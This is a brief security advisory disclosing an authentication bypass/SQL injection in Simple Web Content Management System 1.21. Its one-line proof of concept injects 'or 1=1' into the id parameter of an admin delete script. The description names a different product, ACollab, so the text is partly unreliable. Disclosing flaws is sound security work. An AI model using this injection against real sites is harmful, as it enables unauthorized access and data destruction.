------------------------------------------------------------------------
Software................Simple Web Content Management System 1.21
Vulnerability...........Authentication Bypass/SQL Injection
Download................http://www.allscoop.com/
Release Date............1/31/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

An Authentication bypass/SQL injection vulnerability in ACollab 1.2
can be exploited to retreive a list of usernames and passwords.


--PoC--
http://localhost/simplecms/admin/item_delete.php?id=0 or 1=1